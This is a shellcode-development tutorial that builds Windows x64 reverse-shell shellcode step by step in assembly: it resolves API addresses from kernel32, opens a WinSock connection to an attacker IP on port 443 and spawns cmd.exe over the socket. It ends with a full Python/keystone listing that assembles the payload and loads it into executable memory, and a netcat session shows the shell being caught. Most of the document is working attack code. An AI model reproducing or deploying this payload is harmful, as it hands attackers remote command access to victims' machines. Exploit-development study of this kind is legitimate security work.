Windows x64 Reverse Shellcode

Previously, we looked at WinExec shellcode. In this article, we’re going to be writing shellcode to connect back to an attacker system and provide command line access to the victim host.

Four steps are needed to do this;

Find GetProcAddress
Locate the Kernel32 Base Address
Parse the Kernel32 Export Address Table
Lookup the the GetProcAddress function pointer

Load the WinSock DLL
Execute GetProcAddress to find the address of LoadLibraryA.
Use LoadLibraryA to load WS2_32.DLL (the DLL needed to create a network socket)

Create a Socket Connection
Lookup the WSAStartup address (needed to initiate usage of WinSock by a process)
Call WSAStartup
Lookup the WSASocketA Address and call the function to spawn a socket
Lookup and call WSAConnect

Spawn cmd.exe connected to the socket
Lookup the address of CreateProcessA.
Create the STARTUPINFOA stucture for use with CreateProcessA, setting STD INPUT/OUTPUT/ERROR to our socket handle.
Call CreateProcessA.


String Operations

I wrote the following script to deal with little endian string encoding, which is certainly better than manually encoding characters!

import binascii
import argparse

def encodeCommand(command):
    result = "".join("{:02x}".format(ord(c)) for c in command)
    ba = bytearray.fromhex(result)
    ba.reverse()
    ba.hex()

    input = ba.hex()
    input = input[::-1]
    n = 16

    byte_list = [input[i:i+n] for i in range(0, len(input), n)]
    for x in reversed(byte_list):
        print("mov rax, 0x" + x[::-1])
        print("push rax;")


argParser = argparse.ArgumentParser()
argParser.add_argument("-t", "--text", help="text to encode", required=True)
args = argParser.parse_args()
encodeCommand(args.text)

The below output shows the WSAStartup string being encoded.

PS C:\Users\user\Desktop> python3 .\little_endian_converter.py -t WSAStartup
mov rax, 0x7075
push rax;
mov rax, 0x7472617453415357
push rax;

Find GetProcAddress

I won’t be covering the process in depth here, since it’s basically the same steps from the previous article. We start by locating the base address of Kernel32.dll, then parse the export address table to find the GetProcAddress pointer.

    " start: "
    "  add rsp, 0xfffffffffffffdf8;"    # Avoid Null Byte
    " locate_kernel32:"
    "   xor rcx, rcx;"                  # Zero RCX contents
    "   mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
    "   mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
    "   mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
    "   lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
    "   xchg rax, rsi;"                 # Swap RAX,RSI
    "   lodsq;"                         # Load qword at address (R)SI into RAX
    "   mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
    "   mov r8, rbx; "                  # Copy Kernel32 base address to R8 register

    # Code for parsing Export Address Table
    "   mov ebx, [rbx+0x3C]; "          # Get Kernel32 PE Signature (offset 0x3C) into EBX
    "   add rbx, r8; "                  # Add defrerenced signature offset to kernel32 base. Store in RBX.
    "   xor r12,r12;"
    "   add r12, 0x88FFFFF;"
    "   shr r12, 0x14;"
    "   mov edx, [rbx+r12];"            # Offset from PE32 Signature to Export Address Table
    
    "   add rdx, r8;"                   # RDX = kernel32.dll + RVA ExportTable = ExportTable Address
    "   mov r10d, [rdx+0x14];"          # Number of functions
    "   xor r11, r11;"                  # Zero R11 before use
    "   mov r11d, [rdx+0x20];"          # AddressOfNames RVA
    "   add r11, r8;"                   # AddressOfNames VMA

    # Loop over Export Address Table to find GetProcAddress Name
    "   mov rcx, r10;"                  # Set loop counter
    "kernel32findfunction: "
    " jecxz FunctionNameFound;"         # Loop around this function until we find WinExec
    "   xor ebx,ebx;"                   # Zero EBX for use
    "   mov ebx, [r11+4+rcx*4];"        # EBX = RVA for first AddressOfName
    "   add rbx, r8;"                   # RBX = Function name VMA
    "   dec rcx;"                       # Decrement our loop by one
    "   mov rax, 0x41636f7250746547;"   # GetProcA
    "   cmp [rbx], rax;"                # Check if we found GetProcA
    "   jnz kernel32findfunction;"

    "FunctionNameFound: "               # Find GetProcessAddress
    # We found our target
    "   xor r11, r11;"
    "   mov r11d, [rdx+0x24];"          # AddressOfNameOrdinals RVA
    "   add r11, r8;"                   # AddressOfNameOrdinals VMA
    # Get the function ordinal from AddressOfNameOrdinals
    "   inc rcx;"
    "   mov r13w, [r11+rcx*2];"         # AddressOfNameOrdinals + Counter. RCX = counter
    # Get function address from AddressOfFunctions
    "   xor r11, r11;"
    "   mov r11d, [rdx+0x1c];"          # AddressOfFunctions RVA
    "   add r11, r8;"                   # AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
    "   mov eax, [r11+4+r13*4];"        # Get the function RVA.
    "   add rax, r8;"                   # Add base address to function RVA
    "   mov r14, rax;"                  # GetProcAddress to R14

Pausing execution after the code runs shows the R14 register now contains the address of GetProcAddress.

0:008> r r14
r14=00007ffa4b0e9b70
0:008> x kernel32!GetProcAddress*
00007ffa`4b0e9b70 KERNEL32!GetProcAddressStub (GetProcAddressStub)

Load the WinSock DLL

Next, we want to find the address of LoadLibraryA to load the WinSock library.

Since GetProcAddress is currently stored in non volatile register R14, we just need to call it supplying the module base address (in this case the previously resolved Kernel32 base) and the name of the function. Below is the functions signature;

FARPROC GetProcAddress(
  [in] HMODULE hModule,
  [in] LPCSTR  lpProcName
);

Below shows how we find the address of LoadLibraryA using GetProcAddress.

    # Below to resolve LoadLibraryA using GetProcAddress
    " mov rcx, 0x41797261; "
    " push rcx; "
    " mov rcx, 0x7262694c64616f4c; "
    " push rcx; "
    " mov rdx, rsp; "                    # LoadLibraryA into RDX
    " mov rcx, r8; "                     # Copy Kernel32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcessAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove Allocated LoadLibrary string
    " mov rsi, rax; "                    # Save the address of loadlibrary in RSI

    # Call LoadLibraryA on WS2_32.DLL 
    " xor rax, rax;"
    " mov rax, 0x6C6C; "             # ll
    " push rax;"
    " mov rax, 0x642E32335F325357;"  # WS2_32.d
    " push rax;"
    " mov rcx, rsp;"                 # copy stack string to RCX
    " sub rsp, 0x30;"
    " call rsi;"                     # Call LoadLibraryA
    " mov r15, rax;"
    " add rsp, 0x30;"                # Clean allocated space on stack
    " add rsp, 0x10;"                # Clean space for ws2_32.dll

Finally, we can call LoadLibraryA on WS2_32.DLL to ensure it’s loaded in the programs virtual address space. The function only takes one parameter, which is the name of the library to be loaded;

HMODULE LoadLibraryA(
  [in] LPCSTR lpLibFileName
);
       # Call LoadLibraryA on WS2_32.DLL 
       " xor rax, rax;"
       " mov rax, 0x6C6C; "             # ll
       " push rax;"
       " mov rax, 0x642E32335F325357;"  # WS2_32.d
       " push rax;"
       " mov rcx, rsp;"                 # copy stack string to RCX
       " sub rsp, 0x30;"
       " call rsi;"                     # Call LoadLibraryA
       " mov r15, rax;"
       " add rsp, 0x30;"                # Clean allocated space on stack
       " add rsp, 0x10;"                # Clean space for ws2_32.dll

Create a Socket Connection

First, we need to call WSAStartup. The WSAStartup function initiates use of the Winsock DLL by a process. We only need to supply the version (2.2) and a pointer to an area in memory where a WSADATA structure will be stored.

int WSAStartup(
        WORD      wVersionRequired, # 0x0202 == Version 2.2
  [out] LPWSADATA lpWSAData         # Pointer to where a WSADATA structure will be populated
);
    # Get WSAStartup Address
    " mov rax, 0x7075;"
    " push rax;"
    " mov rax, 0x7472617453415357;"
    " push rax;"
    " mov rdx, rsp; "                    # WSAStartup into RDX
    " mov rcx, r15; "                    # Copy WS2_32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcessAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove Allocated LoadLibrary string
    " mov r12, rax; "                    # Save the address of WSAStartup in RSI

    # Call WSAStartup
    " xor rcx,rcx; "
    " mov cx,408; "
    " sub rsp,rcx; "
    " lea rdx,[rsp]; "                    # lpWSAData
    " mov cx,514; "                       # wVersionRequired
    " sub rsp,88; "
    " call r12; "                         # Call WSAStartup

Next, we call WSASocketA. Below shows the method signature and the values we want to populate.

SOCKET WSAAPI WSASocketA(
  [in] int                 af,              # RCX   (AF_INET == 2)
  [in] int                 type,            # RDX   (SOCK_STREAM == 1)
  [in] int                 protocol,        # R8    (IPPROTO_TCP == 6)
  [in] LPWSAPROTOCOL_INFOA lpProtocolInfo,  # R9    (NULL)
  [in] GROUP               g,               # Stack (NULL)
  [in] DWORD               dwFlags          # Stack (NULL)
);

The function can be called using the following code;

    # Create a socket with WSASocketA
    " sub rsp,0x208;"
    " xor rdx, rdx;"
    " sub rsp, 88;"
    " mov [rsp+32], rdx;"
    " mov [rsp+40], rdx;"
    " inc rdx;"
    " mov rcx, rdx;"
    " inc rcx;"
    " xor r8,r8;"
    " add r8,6;"
    " xor r9,r9;"
    " mov r9w,98*4;"
    " mov ebx,[r15+r9];"
    " xor r9,r9;"
    " call r12;"
    " mov r13, rax;"
    " add rsp, 0x208;"

This results in our register and stack values being set correctly;

0:008> r
rax=00007ffa4b1a4850 rbx=0000000000051a1c rcx=0000000000000002
rdx=0000000000000001 rsi=00007ffa4b0efcc0 rdi=0000000000000000
rip=00000117fef70194 rsp=000000011456f730 rbp=0000000000000000
 r8=0000000000000006  r9=0000000000000000 r10=0000000000000055
r11=000000011456f630 r12=00007ffa4b1a4850 r13=00000000000002c3
r14=00007ffa4b0e9b70 r15=00007ffa4b190000
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             
0:008> dq rsp L2
00000001`1456f730  00000000`00000000 00000000`00000000

Next, we need to call WSAConnect. We provide this function the IP address and port of the system we want to connect to.

int WSAAPI WSAConnect(
  [in]  SOCKET         s,
  [in]  const sockaddr *name,
  [in]  int            namelen,
  [in]  LPWSABUF       lpCallerData,
  [out] LPWSABUF       lpCalleeData,
  [in]  LPQOS          lpSQOS,
  [in]  LPQOS          lpGQOS
);

Formatting the IP address and port can be done using WinDBG.

       # IP Address Calculations
        0:008> ? 0n192
        Evaluate expression: 192 = 00000000`000000c0
        0:008> ? 0n168
        Evaluate expression: 168 = 00000000`000000a8
        0:008> ? 0n1
        Evaluate expression: 1 = 00000000`00000001
        0:008> ? 0n193
        Evaluate expression: 193 = 00000000`000000c1

       # 192.168.1.193  = 0xc101a8c0

        0:008> ? 0n443
        Evaluate expression: 443 = 00000000`000001bb
        Port 443 = 0xbb01 

Once again, we find the functions address using GetProcAddress.

       # Lookup WSAConnect Address
       " mov rax, 0x7463;"
       " push rax;"
       " mov rax, 0x656e6e6f43415357;"
       " push rax;"                         # WSAConnect
       " mov rdx, rsp; "                    # WSAConnect into RDX
       " mov rcx, r15; "                    # Copy WS2_32 base address to RCX
       " sub rsp, 0x30; "                   # Make some room on the stack
       " call r14;"                         # Call GetProcessAddress
       " add rsp, 0x30; "                   # Remove allocated stack space
       " add rsp, 0x10; "                   # Remove Allocated LoadLibrary string
       " mov r12, rax; "                    # Save the address of WSAConnect in R12

Then call the function to make a connection.

       " mov rcx, r13;"          # Our socket handle as parameter 1
       " sub rsp,0x208;"         # Make some room on the stack
       " xor rax,rax;"
       " inc rax; "
       " inc rax; "
       " mov [rsp], rax;"         # AF_INET = 2
       " mov rax, 0xbb01;"        # Port
       " mov [rsp+2], rax; "      # Port
       " mov rax, 0xc101a8c0;"    # IP 
       " mov [rsp+4], rax ;"      # IP
       " lea rdx,[rsp];"          # Save our pointer to RDX
       " mov r8, 0x16; "          # Move 0x10 to namelen
       " xor r9,r9;"              
       " push r9;"                # NULL lpCallerData
       " push r9;"                # NULL lpCallerData
       " push r9;"                # NULL lpSQOS
       " sub rsp, 0x88; "         # NULL lpSQOS
       " call r12;"               # Call WSAConnect

Spawn cmd.exe Connected to the Socket

With the socket established, we just need to call CreateProcessA to execute cmd.exe, and set it’s input/output handles to our established socket.

    # Find CreateProcessA address in kernel32.dll
    # Lookup Kernel32 base address again...
    " xor rcx, rcx;"                  # Zero RCX contents
    " mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
    " mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
    " mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
    " lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
    " xchg rax, rsi;"                 # Swap RAX,RSI
    " lodsq;"                         # Load qword at address (R)SI into RAX
    " mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
    " mov r8, rbx; "                  # Copy Kernel32 base address to R8 register

    # Find address for CreateProcessA. Store in R12 (previously stored WSAConnect)
    " mov rax, 0x41737365636f;"
    " push rax;"
    " mov rax, 0x7250657461657243;"
    " push rax;"                         # CreateProcessA
    " mov rdx, rsp; "                    # CreateProcessA into RDX
    " mov rcx, r8; "                     # Copy Kernel32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcessAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove Allocated CreateProcessA string
    " mov r12, rax; "                    # Save the address of CreateProcessA in R12

Get a pointer to the string cmd.exe, and create a STARTUPINFOA structure.

typedef struct _STARTUPINFOA {
  DWORD  cb;
  LPSTR  lpReserved;
  LPSTR  lpDesktop;
  LPSTR  lpTitle;
  DWORD  dwX;
  DWORD  dwY;
  DWORD  dwXSize;
  DWORD  dwYSize;
  DWORD  dwXCountChars;
  DWORD  dwYCountChars;
  DWORD  dwFillAttribute;
  DWORD  dwFlags;
  WORD   wShowWindow;
  WORD   cbReserved2;
  LPBYTE lpReserved2;
  HANDLE hStdInput;
  HANDLE hStdOutput;
  HANDLE hStdError;
} STARTUPINFOA, *LPSTARTUPINFOA;

    # Push cmd.exe string to stack
    " mov rax, 0x6578652e646d63; "
    " push rax; "
    " mov rcx, rsp; "                # RCX = lpApplicationName (cmd.exe)


    # STARTUPINFOA Structure
    " push r13;"                     # Push STDERROR
    " push r13;"                     # Push STDOUTPUT
    " push r13;"                     # Push STDINPUT
    " xor rax,rax; "
    " push ax;"
    " push rax;"
    " push rax;"
    " mov rax, 0x100;"
    " push ax;"
    " xor rax,rax;"
    " push ax;"
    " push ax;"
    " push rax;"
    " push rax; "                    # dwXSize = NULL
    " push rax; "                    # dwY = NULL
    " push rax; "                    # dwX = NULL
    " push rax; "                    # lpDesktop = NULL
    " push rax; "                    # lpReserved = NULL
    " mov rax, 0x68;"                
    " push rax;"                     # SizeOfStruct = 0x68
    " mov rdi,rsp;"                  # Copy the Pointer to RDI

Examining the structure using WinDBG shows it’s correctly formatted.

# 0:009> dt STARTUPINFOA [rsp]
# combase!STARTUPINFOA
#    +0x000 cb               : 0x68
#    +0x008 lpReserved       : (null) 
#    +0x010 lpDesktop        : (null) 
#    +0x018 lpTitle          : (null) 
#    +0x020 dwX              : 0
#    +0x024 dwY              : 0
#    +0x028 dwXSize          : 0
#    +0x02c dwYSize          : 0
#    +0x030 dwXCountChars    : 0
#    +0x034 dwYCountChars    : 0
#    +0x038 dwFillAttribute  : 0
#    +0x03c dwFlags          : 0x100
#    +0x040 wShowWindow      : 0
#    +0x042 cbReserved2      : 0
#    +0x048 lpReserved2      : (null) 
#    +0x050 hStdInput        : (null) 
#    +0x058 hStdOutput       : 0x00000000`000000a4 Void
#    +0x060 hStdError        : 0x00000000`000000a4 Void

Finally, call CreateProcessA to start cmd.exe.

BOOL CreateProcessA(
  [in, optional]      LPCSTR                lpApplicationName,
  [in, out, optional] LPSTR                 lpCommandLine,
  [in, optional]      LPSECURITY_ATTRIBUTES lpProcessAttributes,
  [in, optional]      LPSECURITY_ATTRIBUTES lpThreadAttributes,
  [in]                BOOL                  bInheritHandles,
  [in]                DWORD                 dwCreationFlags,
  [in, optional]      LPVOID                lpEnvironment,
  [in, optional]      LPCSTR                lpCurrentDirectory,
  [in]                LPSTARTUPINFOA        lpStartupInfo,
  [out]               LPPROCESS_INFORMATION lpProcessInformation
);
    # Call CreateProcessA
    " mov rax, rsp;"                # Get current stack pointer
    " sub rax, 0x500;"
    " push rax; "                   # ProcessInfo
    " push rdi; "                   # StartupInfo          = Pointer to STARTUPINFOA
    " xor rax, rax; "
    " push rax; "                   # lpCurrentDirectory   = NULL
    " push rax; "                   # lpEnvironment        = NULL
    " push rax;"                    
    " inc rax;  "
    " push rax; "                   # bInheritHandles      = 1
    " xor rax, rax; "
    " push rax;"
    " push rax;"
    " push rax;"
    " push rax; "                   # dwCreationFlags      = NULL
    " mov r8, rax; "                # lpThreadAttributes   = NULL              
    " mov r9, rax; "                # lpProcessAttributes  = NULL              
    " mov rdx, rcx; "               # lpCommandLine        = "cmd.exe" string  
    " mov rcx, rax; "               # lpApplicationName    = NULL              
    " call r12; "                   # Call CreateProcessA

With everything in place, our code should now be able to connect back to an attacker system with a command prompt;

┌──(root㉿kali)-[~]
└─# nc -nvv -p 443 -l
listening on [any] 443 ...
connect to [192.168.1.193] from (UNKNOWN) [192.168.1.213] 54111
Microsoft Windows [Version 10.0.22000.1335]
(c) Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>

Closing Thoughts

  • The opcode generated is around 715 bytes, which is quite large. This could be improved by implementing functions to perform address lookups, rather than repeating the same process each time. In addition, instead of using GetProcAddress, we could manually traverse the Export Address Table for DLL’s to locate function pointers.
  • The code currently contains NULL bytes. These could be removed through a similar process performed in the last article.

Finished Code Listing

import ctypes, struct
import binascii
import os
import subprocess
from keystone import *

#####################################################################################
# ██████╗░░█████╗░██████╗░██████╗░███████╗██████╗░░██████╗░░█████╗░████████╗███████╗#
# ██╔══██╗██╔══██╗██╔══██╗██╔══██╗██╔════╝██╔══██╗██╔════╝░██╔══██╗╚══██╔══╝██╔════╝#
# ██████╦╝██║░░██║██████╔╝██║░░██║█████╗░░██████╔╝██║░░██╗░███████║░░░██║░░░█████╗░░#
# ██╔══██╗██║░░██║██╔══██╗██║░░██║██╔══╝░░██╔══██╗██║░░╚██╗██╔══██║░░░██║░░░██╔══╝░░#
# ██████╦╝╚█████╔╝██║░░██║██████╔╝███████╗██║░░██║╚██████╔╝██║░░██║░░░██║░░░███████╗#
# ╚═════╝░░╚════╝░╚═╝░░╚═╝╚═════╝░╚══════╝╚═╝░░╚═╝░╚═════╝░╚═╝░░╚═╝░░░╚═╝░░░╚══════╝#
#####################################################################################
#                        x64 Reverse Shell Shellcode                                #
#####################################################################################


def main():
    SHELLCODE = (
    " start: "
    "  add rsp, 0xfffffffffffffdf8;"    # Avoid Null Byte
    " locate_kernel32:"
    "   xor rcx, rcx;"                  # Zero RCX contents
    "   mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
    "   mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
    "   mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
    "   lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
    "   xchg rax, rsi;"                 # Swap RAX,RSI
    "   lodsq;"                         # Load qword at address (R)SI into RAX
    "   mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
    "   mov r8, rbx; "                  # Copy Kernel32 base address to R8 register

    # Code for parsing Export Address Table
    "   mov ebx, [rbx+0x3C]; "          # Get Kernel32 PE Signature (offset 0x3C) into EBX
    "   add rbx, r8; "                  # Add defrerenced signature offset to kernel32 base. Store in RBX.
    "   xor r12,r12;"
    "   add r12, 0x88FFFFF;"
    "   shr r12, 0x14;"
    "   mov edx, [rbx+r12];"            # Offset from PE32 Signature to Export Address Table
    
    "   add rdx, r8;"                   # RDX = kernel32.dll + RVA ExportTable = ExportTable Address
    "   mov r10d, [rdx+0x14];"          # Number of functions
    "   xor r11, r11;"                  # Zero R11 before use
    "   mov r11d, [rdx+0x20];"          # AddressOfNames RVA
    "   add r11, r8;"                   # AddressOfNames VMA

    # Loop over Export Address Table to find GetProcAddress Name
    "   mov rcx, r10;"                  # Set loop counter
    "kernel32findfunction: "
    " jecxz FunctionNameFound;"         # Loop around this function until we find WinExec
    "   xor ebx,ebx;"                   # Zero EBX for use
    "   mov ebx, [r11+4+rcx*4];"        # EBX = RVA for first AddressOfName
    "   add rbx, r8;"                   # RBX = Function name VMA
    "   dec rcx;"                       # Decrement our loop by one
    "   mov rax, 0x41636f7250746547;"   # GetProcA
    "   cmp [rbx], rax;"                # Check if we found GetProcA
    "   jnz kernel32findfunction;"

    "FunctionNameFound: "               # Find GetProcessAddress
    # We found our target
    "   xor r11, r11;"
    "   mov r11d, [rdx+0x24];"          # AddressOfNameOrdinals RVA
    "   add r11, r8;"                   # AddressOfNameOrdinals VMA
    # Get the function ordinal from AddressOfNameOrdinals
    "   inc rcx;"
    "   mov r13w, [r11+rcx*2];"         # AddressOfNameOrdinals + Counter. RCX = counter
    # Get function address from AddressOfFunctions
    "   xor r11, r11;"
    "   mov r11d, [rdx+0x1c];"          # AddressOfFunctions RVA
    "   add r11, r8;"                   # AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
    "   mov eax, [r11+4+r13*4];"        # Get the function RVA.
    "   add rax, r8;"                   # Add base address to function RVA
    "   mov r14, rax;"                  # GetProcAddress to R14

    # Below to resolve LoadLibraryA using GetProcAddress
    " mov rcx, 0x41797261; "
    " push rcx; "
    " mov rcx, 0x7262694c64616f4c; "
    " push rcx; "
    " mov rdx, rsp; "                    # LoadLibraryA into RDX
    " mov rcx, r8; "                     # Copy Kernel32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcessAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove Allocated LoadLibrary string
    " mov rsi, rax; "                    # Save the address of loadlibrary in RSI

    # Call LoadLibraryA on WS2_32.DLL 
    " xor rax, rax;"
    " mov rax, 0x6C6C; "             # ll
    " push rax;"
    " mov rax, 0x642E32335F325357;"  # WS2_32.d
    " push rax;"
    " mov rcx, rsp;"                 # copy stack string to RCX
    " sub rsp, 0x30;"
    " call rsi;"                     # Call LoadLibraryA
    " mov r15, rax;"
    " add rsp, 0x30;"                # Clean allocated space on stack
    " add rsp, 0x10;"                # Clean space for ws2_32.dll
    
    # Get WSAStartup Address
    " mov rax, 0x7075;"
    " push rax;"
    " mov rax, 0x7472617453415357;"
    " push rax;"
    " mov rdx, rsp; "                    # WSAStartup into RDX
    " mov rcx, r15; "                    # Copy WS2_32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcessAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove Allocated LoadLibrary string
    " mov r12, rax; "                    # Save the address of WSAStartup in RSI

    " int3;"
    # Call WSAStartup
    " xor rcx,rcx; "
    " mov cx,408; "
    " sub rsp,rcx; "
    " lea rdx,[rsp]; "                    # lpWSAData [out]
    " mov cx,514; "                       # wVersionRequired
    " sub rsp,88; "
    " call r12; "                         # Call WSAStartup

    # Lookup WSASocketA Address
    " mov rax, 0x4174;"
    " push rax;"
    " mov rax, 0x656b636f53415357;"
    " push rax;"                         # WSASocketA
    " mov rdx, rsp; "                    # WSASocketA into RDX
    " mov rcx, r15; "                    # Copy WS2_32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcessAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove Allocated LoadLibrary string
    " mov r12, rax; "                    # Save the address of WSASocketA in RSI

    # Create a socket with WSASocketA
    " sub rsp,0x208;"
    " xor rdx, rdx;"
    " sub rsp, 88;"
    " mov [rsp+32], rdx;"
    " mov [rsp+40], rdx;"
    " inc rdx;"
    " mov rcx, rdx;"
    " inc rcx;"
    " xor r8,r8;"
    " add r8,6;"
    " xor r9,r9;"
    " mov r9w,98*4;"
    " mov ebx,[r15+r9];"
    " xor r9,r9;"
    " call r12;"
    " mov r13, rax;"
    " add rsp, 0x208;"

    # Lookup WSAConnect Address
    " mov rax, 0x7463;"
    " push rax;"
    " mov rax, 0x656e6e6f43415357;"
    " push rax;"                         # WSAConnect
    " mov rdx, rsp; "                    # WSAConnect into RDX
    " mov rcx, r15; "                    # Copy WS2_32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcessAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove Allocated LoadLibrary string
    " mov r12, rax; "                    # Save the address of WSAConnect in R12

    # Call WSAConnect...
    " mov rcx, r13;"          # Our socket handle as parameter 1
    " sub rsp,0x208;"         # Make some room on the stack
    " xor rax,rax;"
    " inc rax; "
    " inc rax; "
    " mov [rsp], rax;"         # AF_INET = 2
    " mov rax, 0xbb01;"        # Port
    " mov [rsp+2], rax; "      # Port
    " mov rax, 0xce01a8c0;"    # IP 
    " mov [rsp+4], rax ;"      # IP
    " lea rdx,[rsp];"          # Save our pointer to RDX
    " mov r8, 0x16; "          # Move 0x10 to namelen
    " xor r9,r9;"              
    " push r9;"                # NULL lpCallerData
    " push r9;"                # NULL lpCallerData
    " push r9;"                # NULL lpSQOS
    " sub rsp, 0x88; "         # NULL lpSQOS
    " call r12;"               # Call WSAConnect

    # Find CreateProcessA address in kernel32.dll
    # Lookup Kernel32 base address again...
    " xor rcx, rcx;"                  # Zero RCX contents
    " mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
    " mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
    " mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
    " lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
    " xchg rax, rsi;"                 # Swap RAX,RSI
    " lodsq;"                         # Load qword at address (R)SI into RAX
    " mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
    " mov r8, rbx; "                  # Copy Kernel32 base address to R8 register

    # Find address for CreateProcessA. Store in R12 (previously stored WSAConnect)
    " mov rax, 0x41737365636f;"
    " push rax;"
    " mov rax, 0x7250657461657243;"
    " push rax;"                         # CreateProcessA
    " mov rdx, rsp; "                    # CreateProcessA into RDX
    " mov rcx, r8; "                     # Copy Kernel32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcessAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove Allocated CreateProcessA string
    " mov r12, rax; "                    # Save the address of CreateProcessA in R12

    # Push cmd.exe string to stack
    " mov rax, 0x6578652e646d63; "
    " push rax; "
    " mov rcx, rsp; "                # RCX = lpApplicationName (cmd.exe)


    # STARTUPINFOA Structure
    " push r13;"                     # Push STDERROR
    " push r13;"                     # Push STDOUTPUT
    " push r13;"                     # Push STDINPUT
    " xor rax,rax; "
    " push ax;"
    " push rax;"
    " push rax;"
    " mov rax, 0x100;"
    " push ax;"
    " xor rax,rax;"
    " push ax;"
    " push ax;"
    " push rax;"
    " push rax; "                    # dwXSize = NULL
    " push rax; "                    # dwY = NULL
    " push rax; "                    # dwX = NULL
    " push rax; "                    # lpDesktop = NULL
    " push rax; "                    # lpReserved = NULL
    " mov rax, 0x68;"                
    " push rax;"                     # SizeOfStruct = 0x68
    " mov rdi,rsp;"                  # Copy the Pointer to RDI


    # Call CreateProcessA
    " mov rax, rsp;"                # Get current stack pointer
    " sub rax, 0x500;"
    " push rax; "                   # ProcessInfo
    " push rdi; "                   # StartupInfo          = Pointer to STARTUPINFOA
    " xor rax, rax; "
    " push rax; "                   # lpCurrentDirectory   = NULL
    " push rax; "                   # lpEnvironment        = NULL
    " push rax;"                    # may not be needed!
    " inc rax;  "
    " push rax; "                   # bInheritHandles      = 1
    " xor rax, rax; "
    " push rax;"
    " push rax;"
    " push rax;"
    " push rax; "                   # dwCreationFlags      = NULL
    " mov r8, rax; "                # lpThreadAttributes   = NULL              
    " mov r9, rax; "                # lpProcessAttributes  = NULL              
    " mov rdx, rcx; "               # lpCommandLine        = "cmd.exe" string  
    " mov rcx, rax; "               # lpApplicationName    = NULL              
    " call r12; "                   # Call CreateProcessA

    )

    # Initialize engine in 64-Bit mode
    ks = Ks(KS_ARCH_X86, KS_MODE_64)
    instructions, count = ks.asm(SHELLCODE)

    sh = b""
    output = ""
    for opcode in instructions:
        sh += struct.pack("B", opcode)                          # To encode for execution
        output += "\\x{0:02x}".format(int(opcode)).rstrip("\n") # For printable shellcode

    shellcode = bytearray(sh)
    print("Shellcode: "  + output )
    print("Bytes: " + str(len(sh)))
    print("Attaching debugger to " + str(os.getpid()));
    subprocess.Popen(["WinDbgX", "/g","/p", str(os.getpid())], shell=True)
    input("Press any key to continue...");

    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
    ctypes.windll.kernel32.RtlCopyMemory.argtypes = ( ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t ) 
    ctypes.windll.kernel32.CreateThread.argtypes = ( ctypes.c_int, ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_int) ) 

    space = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buff = ( ctypes.c_char * len(shellcode) ).from_buffer_copy( shellcode )
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_void_p(space),buff,ctypes.c_int(len(shellcode)))
